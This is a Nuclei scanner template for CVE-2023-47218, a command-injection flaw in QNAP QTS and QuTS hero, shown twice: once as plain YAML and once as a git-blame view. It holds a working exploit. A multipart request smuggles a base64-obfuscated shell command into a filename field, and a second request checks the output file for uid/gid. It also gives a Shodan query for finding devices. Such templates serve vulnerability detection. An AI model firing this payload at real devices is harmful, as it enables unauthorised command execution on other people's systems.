nuclei-templates/http/cves/2023/CVE-2023-47218.yaml

id: CVE-2023-47218

info:
  name: QNAP QTS and QuTS Hero  - OS Command Injection
  author: ritikchaddha
  severity: medium
  description: |
    An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.
  reference:
    - https://github.com/passwa11/CVE-2023-47218
    - https://twitter.com/win3zz/status/1760224052289888668/photo/3
    - https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47218
    - https://www.qnap.com/en/security-advisory/qsa-23-57
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 5.8
    cve-id: CVE-2023-47218
    cwe-id: CWE-77
    epss-score: 0.00305
    epss-percentile: 0.69699
  metadata:
    verified: true
    max-request: 2
    shodan-query: ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS"
  tags: cve,cve2023,qnap,qts,quts,rce,intrusive
variables:
  file: '{{rand_base(6)}}'
  cmd: '%22$($(echo -n aWQ=|base64 -d)>{{file}})%22'

http:
  - raw:
      - |
        POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;boundary="avssqwfz"

        --avssqwfz
        Content-Disposition: form-data; xxpcscma="field2"; zczqildp="{{cmd}}"
        Content-Type: text/plain

        skfqduny
        --avssqwfz–

      - |
        POST /cgi-bin/quick/{{file}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_1, "code\": 200", "full_path_filename success")'
          - 'contains_all(body_2, "uid=", "gid=")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100ec7d20f744003a1c2ed7444be98278cc629581cb5099e4b67f6e133003420223022100d3c72e77322b2b66a8cbdbb608afe345f84e1fb986d6f09ec3be65cb6654952c:922c64590222798bb761d5b6d8e72950
-												Create CVE-2023-47218.yaml
											
										
										
											2024-04-05 04:28:31 +00:00
+								id: CVE-2023-47218
 								info:
 								  name: QNAP QTS and QuTS Hero  - OS Command Injection
 								  author: ritikchaddha
-												product/queries updated

											
										
										
											2024-05-31 19:23:20 +00:00
+								  severity: medium
-												Create CVE-2023-47218.yaml
											
										
										
											2024-04-05 04:28:31 +00:00
+								  description: |
 								    An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.
 								  reference:
 								    - https://github.com/passwa11/CVE-2023-47218
 								    - https://twitter.com/win3zz/status/1760224052289888668/photo/3
 								    - https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/
 								    - https://nvd.nist.gov/vuln/detail/CVE-2023-47218
-												product/queries updated

											
										
										
											2024-05-31 19:23:20 +00:00
+								    - https://www.qnap.com/en/security-advisory/qsa-23-57
-												Create CVE-2023-47218.yaml
											
										
										
											2024-04-05 04:28:31 +00:00
+								  classification:
-												product/queries updated

											
										
										
											2024-05-31 19:23:20 +00:00
+								    cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L
 								    cvss-score: 5.8
-												Revert "TemplateMan Update [Mon Apr  8 11:30:07 UTC 2024] :robot:"

This reverts commit 433dda4ae5b824564b44075bb95a96ecdbe263a6.

											
										
										
											2024-04-08 11:34:33 +00:00
+								    cve-id: CVE-2023-47218
-												product/queries updated

											
										
										
											2024-05-31 19:23:20 +00:00
+								    cwe-id: CWE-77
 								    epss-score: 0.00305
 								    epss-percentile: 0.69699
-												Create CVE-2023-47218.yaml
											
										
										
											2024-04-05 04:28:31 +00:00
+								  metadata:
 								    verified: true
 								    max-request: 2
 								    shodan-query: ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS"
 								  tags: cve,cve2023,qnap,qts,quts,rce,intrusive
 								variables:
 								  file: '{{rand_base(6)}}'
 								  cmd: '%22$($(echo -n aWQ=|base64 -d)>{{file}})%22'
 								http:
 								  - raw:
 								      - |
 								        POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1
 								        Host: {{Hostname}}
 								        Content-Type: multipart/form-data;boundary="avssqwfz"
 								        --avssqwfz
 								        Content-Disposition: form-data; xxpcscma="field2"; zczqildp="{{cmd}}"
 								        Content-Type: text/plain
 								        skfqduny
 								        --avssqwfz–
 								      - |
 								        POST /cgi-bin/quick/{{file}} HTTP/1.1
 								        Host: {{Hostname}}
 								    matchers:
 								      - type: dsl
 								        dsl:
 								          - 'contains_all(body_1, "code\": 200", "full_path_filename success")'
 								          - 'contains_all(body_2, "uid=", "gid=")'
 								          - 'status_code == 200'
 								        condition: and
-												Auto Template Signing [Sat Jun  1 06:52:59 UTC 2024] :robot:

											
										
										
											2024-06-01 06:53:00 +00:00
+								# digest: 4b0a00483046022100ec7d20f744003a1c2ed7444be98278cc629581cb5099e4b67f6e133003420223022100d3c72e77322b2b66a8cbdbb608afe345f84e1fb986d6f09ec3be65cb6654952c:922c64590222798bb761d5b6d8e72950